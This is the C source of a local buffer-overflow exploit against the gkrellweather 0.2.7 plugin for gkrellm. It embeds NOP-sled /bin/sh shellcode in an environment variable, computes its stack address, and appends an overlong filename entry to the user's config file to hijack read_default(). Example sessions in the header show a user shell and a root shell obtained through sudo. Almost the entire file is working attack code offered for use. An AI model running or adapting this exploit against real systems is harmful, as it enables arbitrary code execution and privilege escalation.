/* -------------------------------------------------------|
 * gkrellweather2sh.c 
 * ------------------|
 * Exploit for gkrellm plugin gkrellweather 0.2.7 
 * -> see func read_default()
 *
 * Coded by Manuel Gebele <forensec at yahoo.de>
 *
 * Example sessions:
 * -----------------|
 * $ gcc gkrellweather2sh.c -o gkrellweather2sh
 * 
 *  ---
 * < 1 >
 *  ---
 * $ ./gkrellweather2sh
 * sh-3.1$ whoami
 * mrxy
 * sh-3.1$ exit
 * exit
 * $
 * 
 * For the next session the file /etc/sudoers must contain
 * the following entry:
 * mrxy  ALL=/path/to/gkrellweather2sh
 *
 *  ---
 * < 2 >
 *  ---
 * $ ./gkrellweather2sh
 * sh-3.1# whoami
 * root
 * sh-3.1# exit
 * exit
 * $
 *
 * NOTE: 
 * gkrellm based on GTK+ and setuid/setgid is not a
 * supported use of GTK+.
 * Try xgtk.c for GTK+ up to v1.2.8. Not tested!
 *
 * -------------------------------------------------------|
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
/*							!must be adapted! */
#define CONFIG_PATH	"/home/mrxy/.gkrellm2/user-config"
#define ENV_NAME 		"PAYLOAD"

static char payload[] = /* /bin/sh */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
/* extra N O P's:
 * running exploit in combination with sudo */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0"					/* xor eax, eax */
"\xb0\x46"					/* mov al, 70 */
"\x31\xdb"					/* xor ebx, ebx */
"\x31\xc9"					/* xor ecx, ecx */
"\xcd\x80"					/* int 0x80 */
"\xeb\x16"					/* jmp short .. */
"\x5b"						/* pop ebx */
"\x31\xc0"					/* xor eax, eax */
"\x88\x43\x07"				/* mov [ebx+7], al */
"\x89\x5b\x08"				/* mov [ebx+8], ebx */
"\x89\x43\x0c"				/* mov [ebx+12], eax */
"\xb0\x0b"					/* mov al, 11 */
"\x8d\x4b\x08"				/* lea ecx, [ebx+8] */
"\x8d\x53\x0c"				/* lea edx, [ebx+12] */
"\xcd\x80"					/* int 0x80 */
"\xe8\xe5\xff\xff\xff"	/* call .. */
/* "\x2f\x62\x69\x6e\x2f\x73\x68" */ 
"/bin/sh"					/* db .. */
;

int main(void)
{
	char lend[9], inject[4], ascii;
	long ret = 0xbffffffa 
				- strlen(payload)
				- strlen("./gkrellweather2sh");
				/*-----------------------------
				 *	environment variable address 
				 */
	int i, j, ucd = open(CONFIG_PATH, O_WRONLY | O_APPEND);
	
	if (ucd == -1)
		return EXIT_FAILURE;

	if (setenv(ENV_NAME, payload, 1) != 0)
		return EXIT_FAILURE;

	snprintf(lend, 9, "%lx", ret);

	i = 7; j = 0;
	while (j < 4) {
		ascii = (lend[i-1] >= 'a' 
			? ((lend[i-1] & 0xdf) - 'A') + 10
			: (lend[i-1] - '0'));
		ascii <<= 4;
		ascii += (lend[i] >= 'a' 
			? ((lend[i] & 0xdf) - 'A') + 10
			: (lend[i] - '0'));
		inject[j++] = ascii;
		i -= 2;
	}
	
	write(ucd, "gkrellweather filename ", 23);
	for (i = 0; i < 200; ++i)
		write(ucd, inject, 4);
	close(ucd);
	
	system("gkrellm");
	
	return EXIT_SUCCESS;
}
/* vim :set ts=3 (Vi IMproved <www.vim.org>) */